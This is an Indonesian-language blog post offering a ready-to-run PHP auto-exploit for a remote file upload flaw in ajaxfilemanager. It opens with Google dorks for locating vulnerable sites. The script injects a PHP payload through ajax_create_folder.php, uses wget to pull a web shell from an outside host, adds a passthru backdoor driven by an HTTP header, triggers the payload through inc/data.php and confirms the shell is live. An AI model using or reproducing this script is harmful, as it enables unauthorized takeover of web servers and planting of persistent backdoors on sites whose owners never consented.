Ajaxfilemanager auto shell upload "remote file upload"




Balik lagi nih, marhaban ya ramadhan bagi yg menjalankan, masih exploit yang pernah gw share ajaxfilemanager remote file upload, tapi kali ini make auto uploader buatan gw :v biar ga ribet..

nih langsung aja

commnadnya
# php ajaxfilemanager.php site.com /path-ajaxfilemanager/
 nanti kalo keupload juga mucul link shellnya


nih scriptnya

<?php

/*
dork inurl:/e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager
     inurl:/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/
     use ur brain :p
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die( "\n[-] No response from {$host}:80\n");

fwrite($sock, $packet);
return stream_get_contents($sock);
}

print "#[+] Author: unnamed48\n";
print "#[+] Script coded BY:unnamed48\n";
print "#[+] Title: Remote File Upload Auto Exploit\n";
print "#[+] Facebook: facebook.com/unnamed48\n";
print "#[+} Website: http://unnamed48.id or gblog48.blogspot.com\n";
print "'##::::'##:'##::: ##:'##::: ##::::'###::::'##::::'##:'########:'########::'##:::::::::'#######::
 ##:::: ##: ###:: ##: ###:: ##:::'## ##::: ###::'###: ##.....:: ##.... ##: ##:::'##::'##.... ##:
 ##:::: ##: ####: ##: ####: ##::'##:. ##:: ####'####: ##::::::: ##:::: ##: ##::: ##:: ##:::: ##:
 ##:::: ##: ## ## ##: ## ## ##:'##:::. ##: ## ### ##: ######::: ##:::: ##: ##::: ##::: #######::
 ##:::: ##: ##. ####: ##. ####: #########: ##. #: ##: ##...:::: ##:::: ##: #########:'##.... ##:
 ##:::: ##: ##:. ###: ##:. ###: ##.... ##: ##:.:: ##: ##::::::: ##:::: ##:...... ##:: ##:::: ##:
. #######:: ##::. ##: ##::. ##: ##:::: ##: ##:::: ##: ########: ########:::::::: ##::. #######::
:.......:::..::::..::..::::..::..:::::..::..:::::..::........::........:::::::::..::::.......:::\n";

if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <ajaxfilemanager_path>\n";
print "\nExample....: php $argv[0] domain.com /e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/\n";
die();
}

$host = $argv[1];
$path1 = $argv[2];

$exploit = "foo=<?php error_reporting(0);print(system('wget http://www.heron-photography.co.uk/shell.txt -O shani.php'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>";
$packet = "POST {$path1}/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($exploit)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$exploit}";

http_send($host, $packet);

$packet = "GET {$path1}/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";

http_send($host, $packet);
$in = "inc/shani.php";
$ha = "http://";
$target = $ha.$host.$path1.$in;
$cek = file_get_contents($target);

print "\n[+] thx to my team Res7ock Crew and my oshi shani jkt48 :*\n";
if(preg_match("/File upload by unnamed48/", $cek))
{
echo "\n\n[+] uploaded XD cek @ http://$host$path1/inc/shani.php\n";
}
else {
echo "\n\n[-] Exploit Failed :( maafkan aku shani\n";
}
?>

video tutorial here
Makasih buat res7ock crew dan bang agus dari idx..

makasih juga shani dan della oshi gw :v "jomblo wota :v"
 

Post a Comment

1 Comments

semangka88 said…
This comment has been removed by a blog administrator.